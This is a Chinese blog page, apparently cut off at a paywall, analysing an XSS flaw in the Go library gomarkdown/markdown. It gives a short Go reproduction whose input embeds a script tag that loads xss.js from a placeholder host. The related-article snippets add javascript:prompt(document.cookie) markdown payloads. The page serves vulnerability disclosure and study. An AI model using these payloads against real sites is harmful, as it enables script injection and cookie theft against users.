【安全漏洞】gomarkdown/markdown 项目的 XSS 漏洞产生与分析

最新推荐文章于 2024-04-23 13:28:42 发布
最新推荐文章于 2024-04-23 13:28:42 发布
阅读量541 收藏
点赞数
分类专栏: 网络 安全 漏洞 文章标签: 网络安全 信息安全 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/HBohan/article/details/119894841
版权

前言

gomarkdown/markdown 是 Go 语言的一个流行模块,它旨在快速地将 Markdown 文档转化为 HTML 页面。而此次发现的漏洞,来源于作者在编写其语法树 Parser 的时候无意的一次 unescape。

漏洞复现

我们首先来看一段代码。

package main
import (
    "fmt"
    "github.com/gomarkdown/markdown"
    "html"
)
func main() {
   
    var textToRender = "```\"1;><script/src=\"http://HOST/xss.js\"></script>\n\n```\n"
    var middleware = html.EscapeString(textToRender)
    var result = markdown.ToHTML([]byte(middleware), nil, nil)
    fmt.Println(string(result))
}
最低0.47元/天 解锁文章
IT老涵
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
基于Python的Struts2-Scan安全漏洞扫描工具设计源码
05-23
Struts2-Scan是一个基于Python开发的安全漏洞扫描工具,包含21个文件,其中包括15个WAR文件、1个Git忽略文件、1个LICENSE文件、1个Markdown文件、1个Python源文件、1个文本文件和1个JSP文件。该项目为用户提供了一个...
Go语言——快速使用Markdown解析库
脑袋装水的博客
09-12 2311
返回一个针对用户生成内容的策略,该内容是HTML所见即所得工具和Markdown转换的结果。您可以安全地输入用户提供的数据,速度快,支持通用扩展(表,智能标点符号替换等),并且对于所有utf-8(unicode)都是安全的输入。若不能保证待解析的内容安全性,例如来自于用户提供的内容,则需要进行内容过滤来保证安全。设计的目的是通过简单、轻量级的方式来添加格式,而不需要使用 HTML。MarkdownBasic 是一个方便简单渲染的函数,它处理没有启用扩展的markdown输入。并应用给定的策略允许列表。
Go语言解析markdown
红牛编程
12-05 2000
文章目录1 概述2 安装 Blackfriday3 解析 MarkDown 内容4 安全过滤安装使用 1 概述 Markdown 是一种轻量级的标记语言。设计的目的是通过简单、轻量级的方式来添加格式,而不需要使用 HTML。 相关文档如下: Markdown语法文档 Markdown语法文档(官方) Markdown语法文档(翻译) 2 安装 Blackfriday Go 语言中解析 Ma...
【go语言】编写一款markdown解析插件,通过wasm给前端调用
2301_76933862的博客
04-23 922
markdownToHTML: 将输入的markdown文本转化为html。windows下, 执行下面build,生成output.wasm。基本都能转换为对应的html标签,但是没有样式。
xssMarkdown
weixin_45946673的博客
10-24 1498
xssMarkdown markdown是一种轻量级标记语言,通过简单语法,可以使文本具有一定格式,最常见于GitHub上readme文件,现这种语言已被广泛使用. Markdown语法中易于攻击的两种 图片 链接 1 markdown插入图片 1.1 markdown语法: ![alt 属性文本](图片地址) 使用实例: ![RUNOOB 图标](https://img-pre.ivsky.com/img/tupian/pre/202103/29/haimian-019.jpg) 格
markdown反射型xss漏洞复现
weixin_30315905的博客
03-19 790
markdown xss漏洞复现 转载至橘子师傅:https://blog.orange.tw/2019/03/a-wormable-xss-on-hackmd.html 漏洞成因 最初是看到HackMD在前端渲染Markdown时的XSS防御所引起我的兴趣,由于HackMD允许嵌入客制化的网页标签,为了防止XSS的问题势必得对HTML进行过滤,这里HackMD使用了一个XSS防御函示库- npm...
基于Python的Struts2全漏洞扫描利用工具设计源码
03-28
这是一个基于Python语言开发的Struts2全漏洞扫描利用工具,包含21个文件。主要文件类型包括15个WAR文件、1个gitignore文件、1个...该项目旨在帮助安全研究人员和开发人员检测和利用Struts2漏洞,提高网络安全防护能力。
Markdown-XSS-Payloads:XSS有效载荷,用于利用Markdown语法
05-28
Markdown是一种轻量级的标记语言,它允许人们使用易读易写的纯文本格式编写文档,然后转换成结构化的HTML(超文本标记...通过深入研究这个项目,我们可以更全面地理解Markdown XSS漏洞,从而采取更有效的防御策略。
基于Python的Struts2全漏洞扫描与利用工具设计源码
最新发布
05-23
Struts2-Scan是一个基于Python开发的Struts2全漏洞扫描与利用工具,包含21个文件,其中包括15个WAR文件、1个Git忽略文件、1个LICENSE文件、1个Markdown文件、1个Python文件、1个文本文件和1个JSP文件。该项目为...
大数据分析与安全课程实验报告及结课论文
04-14
其中分析步骤以Markdown的形式给出; 用非监督学习算法设计一个通用的网络攻击分类器,可将样本归为5类:benign(良性的)、DoS类、r2l类、u2r类、probe类。根据机器学习在网络空间安全研究中的应用流程,进行模型...
Go-用来显示markdown文档的基于gin框架的go语言开发的博客
08-14
用来显示 markdown 文档的,基于 gin 框架的, go 语言开发的博客
Go-Go语言中的一个简单的markdown预览工具
08-14
Go语言中的一个简单的markdown预览工具
伸向Markdown的黑手,知名博客平台曝出LFI漏洞
AKAMAI_CHINA的博客
01-24 1031
信息安全界,保护敏感信息是一个老生常谈的问题。作为研究人员,我们非常清楚信息是如何被滥用的。有鉴于LFI攻击如此庞大的规模,这方面需要引起开发者和安全专家的广泛注意。各种报错信息看似繁杂,但其中往往蕴含着很多有价值的内容,有心的攻击者完全可以借助这些内容发起不同类型的攻击。因此到底要在对外展示的错误信息中包含什么内容,开发者必须慎重考虑。本文介绍的,通过Markdown导入和解析功能进行的本地文件包含攻击,这种方式可能适用于更多应用程序,只不过暂时还未被发现,但这只是时间问题。
test
lastbright的博客
01-25 82
[a](javascript:prompt(document.cookie)) [a](j a v a s c r i p t:prompt(document.cookie)) ![a](javascript:prompt(document.cookie)) &amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;lt;javascript:prompt(document.cook
CVE-2023-2317:Typora 远程代码执行漏洞复现
薛定谔嘚喵博客
09-06 471
Typora是一款编辑器。Typora 1.6.7之前版本存在安全漏洞,该漏洞源于通过在标签中加载 typora://app/typemark/updater/update.html ,可以在Typora主窗口中加载JavaScript代码。
Typora 远程代码执行漏洞(CVE-2023-2317)
qq_42751192的博客
08-29 1275
Typora 是一款由 Abner Lee 开发的轻量级 Markdown 编辑器,与其他 Markdown 编辑器不同的是,Typora 没有采用源代码和预览双栏显示的方式,而是采用所见即所得的编辑方式,实现了即时预览的功能,但也可切换至源代码编辑模式。
高性能Go语言Markdown文档解析器介绍
haming123的专栏
04-06 1092
wego/wmd是一款Go语言Markdown文档解析器,突出特点是解析性能高,支持基本的Markdown语法,并对图片以及表格进行了扩展。具体特征如下: 解析性能高。 支持图片块,可定义图片的aling属性以及图片的高度、宽度。 支持表格块的显示,可定义表格的aling属性、宽度属性、是否显示标题,以及单元格的aling属性。 代码 go get github.com/haming123/wego/wmd 快速上手 func HandlerShowMd(w http.ResponseWriter, r
markdown编辑器
weixin_43283204的博客
11-01 300
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Ma...
GNOME默認markdown編輯器 /text/markdown Typora
10-09
GNOME 默认的 markdown 编辑器是 Gedit。但是,你也可以选择使用 Typora,它是一款功能强大的 markdown 编辑器,支持实时预览、语法高亮和导出多种格式等功能。 相关问题: 1. Gedit 有哪些主要特点? 2. Typora 支持哪些导出文件格式? 3. 还有其他可以替代 Gedit

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值